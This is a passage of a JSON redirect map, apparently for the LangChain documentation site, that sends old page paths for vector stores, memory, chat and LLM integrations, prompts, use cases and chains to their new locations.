"destination": "/docs/integrations/vectorstores/qdrant"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/redis.html",
"destination": "/docs/integrations/vectorstores/redis"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/redis",
"destination": "/docs/integrations/vectorstores/redis"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/singlestoredb.html",
"destination": "/docs/integrations/vectorstores/singlestoredb"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/singlestoredb",
"destination": "/docs/integrations/vectorstores/singlestoredb"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/sklearn.html",
"destination": "/docs/integrations/vectorstores/sklearn"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/sklearn",
"destination": "/docs/integrations/vectorstores/sklearn"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/supabase.html",
"destination": "/docs/integrations/vectorstores/supabase"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/supabase",
"destination": "/docs/integrations/vectorstores/supabase"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/tair.html",
"destination": "/docs/integrations/vectorstores/tair"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/tair",
"destination": "/docs/integrations/vectorstores/tair"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/tigris.html",
"destination": "/docs/integrations/vectorstores/tigris"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/tigris",
"destination": "/docs/integrations/vectorstores/tigris"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/typesense.html",
"destination": "/docs/integrations/vectorstores/typesense"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/typesense",
"destination": "/docs/integrations/vectorstores/typesense"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/vectara.html",
"destination": "/docs/integrations/vectorstores/vectara"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/vectara",
"destination": "/docs/integrations/vectorstores/vectara"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/weaviate.html",
"destination": "/docs/integrations/vectorstores/weaviate"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/weaviate",
"destination": "/docs/integrations/vectorstores/weaviate"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/zilliz.html",
"destination": "/docs/integrations/vectorstores/zilliz"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/zilliz",
"destination": "/docs/integrations/vectorstores/zilliz"
},
{
"source": "/en/latest/modules/memory/examples/adding_memory.html",
"destination": "/docs/modules/memory/how_to/adding_memory"
},
{
"source": "/en/latest/modules/memory/examples/adding_memory_chain_multiple_inputs.html",
"destination": "/docs/modules/memory/how_to/adding_memory_chain_multiple_inputs"
},
{
"source": "/en/latest/modules/memory/examples/agent_with_memory.html",
"destination": "/docs/modules/memory/how_to/agent_with_memory"
},
{
"source": "/en/latest/modules/memory/examples/agent_with_memory_in_db.html",
"destination": "/docs/modules/memory/how_to/agent_with_memory_in_db"
},
{
"source": "/en/latest/modules/memory/examples/conversational_customization.html",
"destination": "/docs/modules/memory/how_to/conversational_customization"
},
{
"source": "/en/latest/modules/memory/examples/custom_memory.html",
"destination": "/docs/modules/memory/how_to/custom_memory"
},
{
"source": "/en/latest/modules/memory/types/kg.html",
"destination": "/docs/modules/memory/how_to/kg"
},
{
"source": "/en/latest/modules/memory/examples/multiple_memory.html",
"destination": "/docs/modules/memory/how_to/multiple_memory"
},
{
"source": "/en/latest/modules/memory/types/summary_buffer.html",
"destination": "/docs/modules/memory/how_to/summary_buffer"
},
{
"source": "/en/latest/modules/memory/types/token_buffer.html",
"destination": "/docs/modules/memory/how_to/token_buffer"
},
{
"source": "/en/latest/modules/memory/examples/cassandra_chat_message_history.html",
"destination": "/docs/integrations/memory/cassandra_chat_message_history"
},
{
"source": "/docs/modules/memory/integrations/cassandra_chat_message_history",
"destination": "/docs/integrations/memory/cassandra_chat_message_history"
},
{
"source": "/en/latest/modules/memory/examples/dynamodb_chat_message_history.html",
"destination": "/docs/integrations/memory/dynamodb_chat_message_history"
},
{
"source": "/docs/modules/memory/integrations/dynamodb_chat_message_history",
"destination": "/docs/integrations/memory/dynamodb_chat_message_history"
},
{
"source": "/en/latest/modules/memory/examples/entity_memory_with_sqlite.html",
"destination": "/docs/integrations/memory/entity_memory_with_sqlite"
},
{
"source": "/docs/modules/memory/integrations/entity_memory_with_sqlite",
"destination": "/docs/integrations/memory/entity_memory_with_sqlite"
},
{
"source": "/en/latest/modules/memory/examples/momento_chat_message_history.html",
"destination": "/docs/integrations/memory/momento_chat_message_history"
},
{
"source": "/docs/modules/memory/integrations/momento_chat_message_history",
"destination": "/docs/integrations/memory/momento_chat_message_history"
},
{
"source": "/en/latest/modules/memory/examples/mongodb_chat_message_history.html",
"destination": "/docs/integrations/memory/mongodb_chat_message_history"
},
{
"source": "/docs/modules/memory/integrations/mongodb_chat_message_history",
"destination": "/docs/integrations/memory/mongodb_chat_message_history"
},
{
"source": "/en/latest/modules/memory/examples/motorhead_memory.html",
"destination": "/docs/integrations/memory/motorhead_memory"
},
{
"source": "/docs/modules/memory/integrations/motorhead_memory",
"destination": "/docs/integrations/memory/motorhead_memory"
},
{
"source": "/en/latest/modules/memory/examples/motorhead_memory_managed.html",
"destination": "/docs/integrations/memory/motorhead_memory_managed"
},
{
"source": "/docs/modules/memory/integrations/motorhead_memory_managed",
"destination": "/docs/integrations/memory/motorhead_memory_managed"
},
{
"source": "/en/latest/modules/memory/examples/postgres_chat_message_history.html",
"destination": "/docs/integrations/memory/postgres_chat_message_history"
},
{
"source": "/docs/modules/memory/integrations/postgres_chat_message_history",
"destination": "/docs/integrations/memory/postgres_chat_message_history"
},
{
"source": "/en/latest/modules/memory/examples/redis_chat_message_history.html",
"destination": "/docs/integrations/memory/redis_chat_message_history"
},
{
"source": "/docs/modules/memory/integrations/redis_chat_message_history",
"destination": "/docs/integrations/memory/redis_chat_message_history"
},
{
"source": "/en/latest/modules/memory/examples/zep_memory.html",
"destination": "/docs/integrations/memory/zep_memory"
},
{
"source": "/docs/modules/memory/integrations/zep_memory",
"destination": "/docs/integrations/memory/zep_memory"
},
{
"source": "/en/latest/modules/models/chat/integrations/anthropic.html",
"destination": "/docs/integrations/chat/anthropic"
},
{
"source": "/docs/modules/model_io/models/chat/integrations/anthropic",
"destination": "/docs/integrations/chat/anthropic"
},
{
"source": "/en/latest/modules/models/chat/integrations/azure_chat_openai.html",
"destination": "/docs/integrations/chat/azure_chat_openai"
},
{
"source": "/docs/modules/model_io/models/chat/integrations/azure_chat_openai",
"destination": "/docs/integrations/chat/azure_chat_openai"
},
{
"source": "/en/latest/modules/models/chat/integrations/google_vertex_ai_palm.html",
"destination": "/docs/integrations/chat/google_vertex_ai_palm"
},
{
"source": "/docs/modules/model_io/models/chat/integrations/google_vertex_ai_palm",
"destination": "/docs/integrations/chat/google_vertex_ai_palm"
},
{
"source": "/en/latest/modules/models/chat/integrations/openai.html",
"destination": "/docs/integrations/chat/openai"
},
{
"source": "/docs/modules/model_io/models/chat/integrations/openai",
"destination": "/docs/integrations/chat/openai"
},
{
"source": "/en/latest/modules/models/chat/integrations/promptlayer_chatopenai.html",
"destination": "/docs/integrations/chat/promptlayer_chatopenai"
},
{
"source": "/docs/modules/model_io/models/chat/integrations/promptlayer_chatopenai",
"destination": "/docs/integrations/chat/promptlayer_chatopenai"
},
{
"source": "/en/latest/modules/models/llms/examples/async_llm.html",
"destination": "/docs/modules/model_io/models/llms/how_to/async_llm"
},
{
"source": "/en/latest/modules/models/llms/examples/custom_llm.html",
"destination": "/docs/modules/model_io/models/llms/how_to/custom_llm"
},
{
"source": "/en/latest/modules/models/llms/examples/fake_llm.html",
"destination": "/docs/modules/model_io/models/llms/how_to/fake_llm"
},
{
"source": "/en/latest/modules/models/llms/examples/human_input_llm.html",
"destination": "/docs/modules/model_io/models/llms/how_to/human_input_llm"
},
{
"source": "/en/latest/modules/models/llms/examples/llm_serialization.html",
"destination": "/docs/modules/model_io/models/llms/how_to/llm_serialization"
},
{
"source": "/en/latest/modules/models/llms/examples/token_usage_tracking.html",
"destination": "/docs/modules/model_io/models/llms/how_to/token_usage_tracking"
},
{
"source": "/en/latest/modules/models/llms/integrations/ai21.html",
"destination": "/docs/integrations/llms/ai21"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/ai21",
"destination": "/docs/integrations/llms/ai21"
},
{
"source": "/en/latest/modules/models/llms/integrations/aleph_alpha.html",
"destination": "/docs/integrations/llms/aleph_alpha"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/aleph_alpha",
"destination": "/docs/integrations/llms/aleph_alpha"
},
{
"source": "/en/latest/modules/models/llms/integrations/anyscale.html",
"destination": "/docs/integrations/llms/anyscale"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/anyscale",
"destination": "/docs/integrations/llms/anyscale"
},
{
"source": "/en/latest/modules/models/llms/integrations/azure_openai_example.html",
"destination": "/docs/integrations/llms/azure_openai_example"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/azure_openai_example",
"destination": "/docs/integrations/llms/azure_openai_example"
},
{
"source": "/en/latest/modules/models/llms/integrations/banana.html",
"destination": "/docs/integrations/llms/banana"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/banana",
"destination": "/docs/integrations/llms/banana"
},
{
"source": "/en/latest/modules/models/llms/integrations/baseten.html",
"destination": "/docs/integrations/llms/baseten"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/baseten",
"destination": "/docs/integrations/llms/baseten"
},
{
"source": "/en/latest/modules/models/llms/integrations/beam.html",
"destination": "/docs/integrations/llms/beam"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/beam",
"destination": "/docs/integrations/llms/beam"
},
{
"source": "/en/latest/modules/models/llms/integrations/bedrock.html",
"destination": "/docs/integrations/llms/bedrock"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/bedrock",
"destination": "/docs/integrations/llms/bedrock"
},
{
"source": "/en/latest/modules/models/llms/integrations/cerebriumai_example.html",
"destination": "/docs/integrations/llms/cerebriumai_example"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/cerebriumai_example",
"destination": "/docs/integrations/llms/cerebriumai_example"
},
{
"source": "/en/latest/modules/models/llms/integrations/cohere.html",
"destination": "/docs/integrations/llms/cohere"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/cohere",
"destination": "/docs/integrations/llms/cohere"
},
{
"source": "/en/latest/modules/models/llms/integrations/ctransformers.html",
"destination": "/docs/integrations/llms/ctransformers"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/ctransformers",
"destination": "/docs/integrations/llms/ctransformers"
},
{
"source": "/en/latest/modules/models/llms/integrations/databricks.html",
"destination": "/docs/integrations/llms/databricks"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/databricks",
"destination": "/docs/integrations/llms/databricks"
},
{
"source": "/en/latest/modules/models/llms/integrations/deepinfra_example.html",
"destination": "/docs/integrations/llms/deepinfra_example"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/deepinfra_example",
"destination": "/docs/integrations/llms/deepinfra_example"
},
{
"source": "/en/latest/modules/models/llms/integrations/forefrontai_example.html",
"destination": "/docs/integrations/llms/forefrontai_example"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/forefrontai_example",
"destination": "/docs/integrations/llms/forefrontai_example"
},
{
"source": "/en/latest/modules/models/llms/integrations/google_vertex_ai_palm.html",
"destination": "/docs/integrations/llms/google_vertex_ai_palm"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/google_vertex_ai_palm",
"destination": "/docs/integrations/llms/google_vertex_ai_palm"
},
{
"source": "/en/latest/modules/models/llms/integrations/gooseai_example.html",
"destination": "/docs/integrations/llms/gooseai_example"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/gooseai_example",
"destination": "/docs/integrations/llms/gooseai_example"
},
{
"source": "/en/latest/modules/models/llms/integrations/huggingface_hub.html",
"destination": "/docs/integrations/llms/huggingface_hub"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/huggingface_hub",
"destination": "/docs/integrations/llms/huggingface_hub"
},
{
"source": "/en/latest/modules/models/llms/integrations/huggingface_pipelines.html",
"destination": "/docs/integrations/llms/huggingface_pipelines"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/huggingface_pipelines",
"destination": "/docs/integrations/llms/huggingface_pipelines"
},
{
"source": "/en/latest/modules/models/llms/integrations/huggingface_textgen_inference.html",
"destination": "/docs/integrations/llms/huggingface_textgen_inference"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/huggingface_textgen_inference",
"destination": "/docs/integrations/llms/huggingface_textgen_inference"
},
{
"source": "/en/latest/modules/models/llms/integrations/jsonformer_experimental.html",
"destination": "/docs/integrations/llms/jsonformer_experimental"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/jsonformer_experimental",
"destination": "/docs/integrations/llms/jsonformer_experimental"
},
{
"source": "/en/latest/modules/models/llms/integrations/llamacpp.html",
"destination": "/docs/integrations/llms/llamacpp"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/llamacpp",
"destination": "/docs/integrations/llms/llamacpp"
},
{
"source": "/en/latest/modules/models/llms/examples/llm_caching.html",
"destination": "/docs/integrations/llms/llm_caching"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/llm_caching",
"destination": "/docs/integrations/llms/llm_caching"
},
{
"source": "/en/latest/modules/models/llms/integrations/manifest.html",
"destination": "/docs/integrations/llms/manifest"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/manifest",
"destination": "/docs/integrations/llms/manifest"
},
{
"source": "/en/latest/modules/models/llms/integrations/modal.html",
"destination": "/docs/integrations/llms/modal"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/modal",
"destination": "/docs/integrations/llms/modal"
},
{
"source": "/en/latest/modules/models/llms/integrations/mosaicml.html",
"destination": "/docs/integrations/llms/mosaicml"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/mosaicml",
"destination": "/docs/integrations/llms/mosaicml"
},
{
"source": "/en/latest/modules/models/llms/integrations/nlpcloud.html",
"destination": "/docs/integrations/llms/nlpcloud"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/nlpcloud",
"destination": "/docs/integrations/llms/nlpcloud"
},
{
"source": "/en/latest/modules/models/llms/integrations/openai.html",
"destination": "/docs/integrations/llms/openai"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/openai",
"destination": "/docs/integrations/llms/openai"
},
{
"source": "/en/latest/modules/models/llms/integrations/openlm.html",
"destination": "/docs/integrations/llms/openlm"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/openlm",
"destination": "/docs/integrations/llms/openlm"
},
{
"source": "/en/latest/modules/models/llms/integrations/petals_example.html",
"destination": "/docs/integrations/llms/petals_example"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/petals_example",
"destination": "/docs/integrations/llms/petals_example"
},
{
"source": "/en/latest/modules/models/llms/integrations/pipelineai_example.html",
"destination": "/docs/integrations/llms/pipelineai_example"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/pipelineai_example",
"destination": "/docs/integrations/llms/pipelineai_example"
},
{
"source": "/en/latest/modules/models/llms/integrations/predictionguard.html",
"destination": "/docs/integrations/llms/predictionguard"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/predictionguard",
"destination": "/docs/integrations/llms/predictionguard"
},
{
"source": "/en/latest/modules/models/llms/integrations/promptlayer_openai.html",
"destination": "/docs/integrations/llms/promptlayer_openai"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/promptlayer_openai",
"destination": "/docs/integrations/llms/promptlayer_openai"
},
{
"source": "/en/latest/modules/models/llms/integrations/rellm_experimental.html",
"destination": "/docs/integrations/llms/rellm_experimental"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/rellm_experimental",
"destination": "/docs/integrations/llms/rellm_experimental"
},
{
"source": "/en/latest/modules/models/llms/integrations/replicate.html",
"destination": "/docs/integrations/llms/replicate"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/replicate",
"destination": "/docs/integrations/llms/replicate"
},
{
"source": "/en/latest/modules/models/llms/integrations/runhouse.html",
"destination": "/docs/integrations/llms/runhouse"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/runhouse",
"destination": "/docs/integrations/llms/runhouse"
},
{
"source": "/en/latest/modules/models/llms/integrations/sagemaker.html",
"destination": "/docs/integrations/llms/sagemaker"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/sagemaker",
"destination": "/docs/integrations/llms/sagemaker"
},
{
"source": "/en/latest/modules/models/llms/integrations/stochasticai.html",
"destination": "/docs/integrations/llms/stochasticai"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/stochasticai",
"destination": "/docs/integrations/llms/stochasticai"
},
{
"source": "/en/latest/modules/models/llms/integrations/writer.html",
"destination": "/docs/integrations/llms/writer"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/writer",
"destination": "/docs/integrations/llms/writer"
},
{
"source": "/en/latest/modules/prompts.html",
"destination": "/docs/modules/model_io/prompts"
},
{
"source": "/en/latest/modules/prompts/output_parsers.html",
"destination": "/docs/modules/model_io/output_parsers/"
},
{
"source": "/docs/modules/prompts/output_parsers.html",
"destination": "/docs/modules/model_io/output_parsers/"
},
{
"source": "/en/latest/modules/prompts/output_parsers/examples/datetime.html",
"destination": "/docs/modules/model_io/output_parsers/datetime"
},
{
"source": "/en/latest/modules/prompts/output_parsers/examples/enum.html",
"destination": "/docs/modules/model_io/output_parsers/enum"
},
{
"source": "/en/latest/modules/prompts/output_parsers/examples/pydantic.html",
"destination": "/docs/modules/model_io/output_parsers/pydantic"
},
{
"source": "/en/latest/modules/prompts/output_parsers/examples/retry.html",
"destination": "/docs/modules/model_io/output_parsers/retry"
},
{
"source": "/en/latest/modules/prompts/example_selectors/examples/custom_example_selector.html",
"destination": "/docs/modules/model_io/prompts/example_selectors/custom_example_selector"
},
{
"source": "/en/latest/modules/prompts/example_selectors/examples/mmr.html",
"destination": "/docs/modules/model_io/prompts/example_selectors/mmr"
},
{
"source": "/en/latest/modules/prompts/example_selectors/examples/ngram_overlap.html",
"destination": "/docs/modules/model_io/prompts/example_selectors/ngram_overlap"
},
{
"source": "/en/latest/modules/prompts/prompt_templates/examples/connecting_to_a_feature_store.html",
"destination": "/docs/modules/model_io/prompts/prompt_templates/connecting_to_a_feature_store"
},
{
"source": "/en/latest/modules/prompts/prompt_templates/examples/custom_prompt_template.html",
"destination": "/docs/modules/model_io/prompts/prompt_templates/custom_prompt_template"
},
{
"source": "/en/latest/modules/models/chat/examples/few_shot_examples.html",
"destination": "/docs/modules/model_io/prompts/prompt_templates/few_shot_examples_chat"
},
{
"source": "/en/latest/modules/prompts/prompt_templates/examples/prompt_serialization.html",
"destination": "/docs/modules/model_io/prompts/prompt_templates/prompt_serialization"
},
{
"source": "/en/latest/use_cases/agent_simulations/camel_role_playing.html",
"destination": "/docs/use_cases/agent_simulations/camel_role_playing"
},
{
"source": "/en/latest/use_cases/agent_simulations/characters.html",
"destination": "/docs/use_cases/agent_simulations/characters"
},
{
"source": "/en/latest/use_cases/agent_simulations/gymnasium.html",
"destination": "/docs/use_cases/agent_simulations/gymnasium"
},
{
"source": "/en/latest/use_cases/agent_simulations/multi_player_dnd.html",
"destination": "/docs/use_cases/agent_simulations/multi_player_dnd"
},
{
"source": "/en/latest/use_cases/agent_simulations/multiagent_authoritarian.html",
"destination": "/docs/use_cases/agent_simulations/multiagent_authoritarian"
},
{
"source": "/en/latest/use_cases/agent_simulations/multiagent_bidding.html",
"destination": "/docs/use_cases/agent_simulations/multiagent_bidding"
},
{
"source": "/en/latest/use_cases/agent_simulations/petting_zoo.html",
"destination": "/docs/use_cases/agent_simulations/petting_zoo"
},
{
"source": "/en/latest/use_cases/agent_simulations/two_agent_debate_tools.html",
"destination": "/docs/use_cases/agent_simulations/two_agent_debate_tools"
},
{
"source": "/en/latest/use_cases/agent_simulations/two_player_dnd.html",
"destination": "/docs/use_cases/agent_simulations/two_player_dnd"
},
{
"source": "/en/latest/use_cases/agents/baby_agi.html",
"destination": "/docs/use_cases/agents/baby_agi"
},
{
"source": "/en/latest/use_cases/agents/baby_agi_with_agent.html",
"destination": "/docs/use_cases/agents/baby_agi_with_agent"
},
{
"source": "/en/latest/use_cases/agents/camel_role_playing.html",
"destination": "/docs/use_cases/agents/camel_role_playing"
},
{
"source": "/en/latest/use_cases/agents/custom_agent_with_plugin_retrieval.html",
"destination": "/docs/use_cases/agents/custom_agent_with_plugin_retrieval"
},
{
"source": "/en/latest/use_cases/agents/custom_agent_with_plugin_retrieval_using_plugnplai.html",
"destination": "/docs/use_cases/agents/custom_agent_with_plugin_retrieval_using_plugnplai"
},
{
"source": "/en/latest/use_cases/agents/multi_modal_output_agent.html",
"destination": "/docs/use_cases/agents/multi_modal_output_agent"
},
{
"source": "/en/latest/use_cases/agents/sales_agent_with_context.html",
"destination": "/docs/use_cases/agents/sales_agent_with_context"
},
{
"source": "/en/latest/use_cases/agents/wikibase_agent.html",
"destination": "/docs/use_cases/agents/wikibase_agent"
},
{
"source": "/en/latest/use_cases/apis.html",
"destination": "/docs/use_cases/apis"
},
{
"source": "/en/latest/use_cases/autonomous_agents/autogpt.html",
"destination": "/docs/use_cases/autonomous_agents/autogpt"
},
{
"source": "/en/latest/use_cases/autonomous_agents/baby_agi.html",
"destination": "/docs/use_cases/autonomous_agents/baby_agi"
},
{
"source": "/en/latest/use_cases/autonomous_agents/baby_agi_with_agent.html",
"destination": "/docs/use_cases/autonomous_agents/baby_agi_with_agent"
},
{
"source": "/en/latest/use_cases/autonomous_agents/marathon_times.html",
"destination": "/docs/use_cases/autonomous_agents/marathon_times"
},
{
"source": "/en/latest/use_cases/autonomous_agents/meta_prompt.html",
"destination": "/docs/use_cases/autonomous_agents/meta_prompt"
},
{
"source": "/en/latest/use_cases/chatbots/voice_assistant.html",
"destination": "/docs/use_cases/chatbots/voice_assistant"
},
{
"source": "/en/latest/use_cases/code/code-analysis-deeplake.html",
"destination": "/docs/use_cases/code/code-analysis-deeplake"
},
{
"source": "/en/latest/use_cases/code/twitter-the-algorithm-analysis-deeplake.html",
"destination": "/docs/use_cases/code/twitter-the-algorithm-analysis-deeplake"
},
{
"source": "/en/latest/use_cases/extraction.html",
"destination": "/docs/use_cases/extraction"
},
{
"source": "/en/latest/use_cases/multi_modal/image_agent.html",
"destination": "/docs/use_cases/multi_modal/image_agent"
},
{
"source": "/en/latest/use_cases/question_answering/semantic-search-over-chat.html",
"destination": "/docs/use_cases/question_answering/semantic-search-over-chat"
},
{
"source": "/en/latest/use_cases/summarization.html",
"destination": "/docs/use_cases/summarization"
},
{
"source": "/en/latest/use_cases/tabular.html",
"destination": "/docs/use_cases/tabular"
},
{
"source": "/en/latest/youtube.html",
"destination": "/docs/additional_resources/youtube"
},
{
"source": "/en/latest/modules/agents/agents/wikibase_agent.html",
"destination": "/docs/use_cases/agents/wikibase_agent"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/twitter-the-algorithm-analysis-deeplake.html",
"destination": "/docs/use_cases/code/twitter-the-algorithm-analysis-deeplake"
},
{
"source": "/en/latest/explanation/tools.html",
"destination": "/docs/modules/agents/tools"
},
{
"source": "/docs",
"destination": "/"
},
{
"source": "/docs/",
"destination": "/"
},
{
"source": "/en/latest",
"destination": "/"
},
{
"source": "/en/latest/",
"destination": "/"
},
{
"source": "/en/latest/index.html",
"destination": "/"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/self_query_retriever.html",
"destination": "/docs/modules/data_connection/retrievers/how_to/self_query/"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/:path*",
"destination": "/docs/integrations/retrievers/:path*"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/:path*",
"destination": "/docs/integrations/retrievers/:path*"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/:path*",
"destination": "/docs/integrations/vectorstores/:path*"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/:path*",
"destination": "/docs/integrations/vectorstores/:path*"
},
{
"source": "/docs/modules/agents/tools/how_to/:path*",
"destination": "/docs/modules/agents/tools/:path*"
},
{
"source": "/docs/modules/callbacks/how_to/:path*",
"destination": "/docs/modules/callbacks/:path*"
},
{
"source": "/docs/modules/data_connection/document_loaders/how_to/:path*",
"destination": "/docs/modules/data_connection/document_loaders/:path*"
},
{
"source": "/docs/modules/data_connection/retrievers/how_to/:path*",
"destination": "/docs/modules/data_connection/retrievers/:path*"
},
{
"source": "/docs/modules/memory/how_to/:path*",
"destination": "/docs/modules/memory/:path*"
},
{
"source": "/docs/modules/model_io/models/chat/how_to/:path*",
"destination": "/docs/modules/model_io/models/chat/:path*"
},
{
"source": "/docs/modules/model_io/models/llms/how_to/:path*",
"destination": "/docs/modules/model_io/models/llms/:path*"
},
{
"source": "/docs/modules/callbacks/integrations/:path*",
"destination": "/docs/integrations/callbacks/:path*"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/:path*",
"destination": "/docs/integrations/document_loaders/:path*"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/:path*",
"destination": "/docs/integrations/text_embedding/:path*"
},
{
"source": "/docs/modules/model_io/models/llms/integrations/:path*",
"destination": "/docs/integrations/llms/:path*"
},
{
"source": "/docs/modules/model_io/models/chat/integrations/:path*",
"destination": "/docs/integrations/chat/:path*"
},
{
"source": "/docs/modules/evaluation(/?)",
"destination": "/docs/guides/evaluation"
},
{
"source": "/docs/modules/evaluation/:path*(/?)",
"destination": "/docs/guides/evaluation/:path*"
},
{
"source": "/en/latest/modules/indexes/:path*",
"destination": "/docs/modules/data_connection/:path*"
},
{
"source": "/en/latest/modules/memory/types/:path*",
"destination": "/docs/modules/memory/how_to/:path*"
},
{
"source": "/en/latest/modules/models.html",
"destination": "/docs/modules/model_io/models/"
},
{
"source": "/en/latest/modules/models/:path*",
"destination": "/docs/modules/model_io/models/:path*"
},
{
"source": "/en/latest/modules/prompts/prompt_templates/examples/:path*",
"destination": "/docs/modules/model_io/prompts/prompt_templates/:path*"
},
{
"source": "/en/latest/modules/prompts/:path1*/examples/:path*",
"destination": "/docs/modules/model_io/prompts/:path1*/:path*"
},
{
"source": "/en/latest/reference.html",
"destination": "https://api.python.langchain.com"
},
{
"source": "/en/latest/reference/:path*",
"destination": "https://api.python.langchain.com/en/latest/:path*"
},
{
"source": "/en/latest/:path*",
"destination": "/docs/:path*"
},
{
"source": "/docs/modules/chains/additional/constitutional_chain",
"destination": "/docs/guides/safety/constitutional_chain"
},
{
"source": "/docs/modules/chains/additional/moderation",
"destination": "/docs/guides/safety/moderation"
},
{
"source": "/docs/modules/chains/popular/api",
"destination": "/docs/use_cases/apis/api"
},
{
"source": "/docs/modules/chains/additional/analyze_document",
"destination": "/docs/use_cases/question_answering/how_to/analyze_document"
},
{
"source": "/docs/modules/chains/popular/chat_vector_db",
"destination": "/docs/use_cases/question_answering/how_to/chat_vector_db"
},
{
"source": "/docs/modules/chains/additional/multi_retrieval_qa_router",
"destination": "/docs/use_cases/question_answering/how_to/multi_retrieval_qa_router"
},
{
"source": "/docs/modules/chains/additional/question_answering",
"destination": "/docs/use_cases/question_answering/how_to/question_answering"
},
{
"source": "/docs/modules/chains/popular/vector_db_qa",
"destination": "/docs/use_cases/question_answering/how_to/vector_db_qa"
},
{
"source": "/docs/modules/chains/popular/summarize",
"destination": "/docs/use_cases/summarization/summarize"
},
{
"source": "/docs/modules/chains/popular/sqlite",
"destination": "/docs/use_cases/tabular/sqlite"
},
{
"source": "/docs/modules/chains/popular/openai_functions",
"destination": "/docs/modules/chains/how_to/openai_functions"
},
{
"source": "/docs/modules/chains/additional/llm_requests",
"destination": "/docs/use_cases/apis/llm_requests"
},
{
"source": "/docs/modules/chains/additional/openai_openapi",
"destination": "/docs/use_cases/apis/openai_openapi"
},
{
"source": "/docs/modules/chains/additional/openapi",
"destination": "/docs/use_cases/apis/openapi"
},
{
"source": "/docs/modules/chains/additional/openapi_openai",
"destination": "/docs/use_cases/apis/openapi_openai"
},
{
"source": "/docs/modules/chains/additional/cpal",
"destination": "/docs/use_cases/code_writing/cpal"
},
{
"source": "/docs/modules/chains/additional/llm_bash",
"destination": "/docs/use_cases/code_writing/llm_bash"
},
{
"source": "/docs/modules/chains/additional/llm_math",
"destination": "/docs/use_cases/code_writing/llm_math"
},
{
"source": "/docs/modules/chains/additional/llm_symbolic_math",
"destination": "/docs/use_cases/code_writing/llm_symbolic_math"
},
{
"source": "/docs/modules/chains/additional/pal",
"destination": "/docs/use_cases/code_writing/pal"
},
{
"source": "/docs/modules/chains/additional/graph_arangodb_qa",
"destination": "/docs/use_cases/graph/graph_arangodb_qa"
},
{
"source": "/docs/modules/chains/additional/graph_cypher_qa",
"destination": "/docs/use_cases/graph/graph_cypher_qa"
},
{
"source": "/docs/modules/chains/additional/graph_hugegraph_qa",
"destination": "/docs/use_cases/graph/graph_hugegraph_qa"
},
{
"source": "/docs/modules/chains/additional/graph_kuzu_qa",
"destination": "/docs/use_cases/graph/graph_kuzu_qa"
},
{
"source": "/docs/modules/chains/additional/graph_nebula_qa",
"destination": "/docs/use_cases/graph/graph_nebula_qa"
},
{
"source": "/docs/modules/chains/additional/graph_qa",
"destination": "/docs/use_cases/graph/graph_qa"
},
{
"source": "/docs/modules/chains/additional/graph_sparql_qa",
"destination": "/docs/use_cases/graph/graph_sparql_qa"
},
{
"source": "/docs/modules/chains/additional/neptune_cypher_qa",
"destination": "/docs/use_cases/graph/neptune_cypher_qa"
},
{
"source": "/docs/modules/chains/additional/tot",
"destination": "/docs/use_cases/graph/tot"
},
{
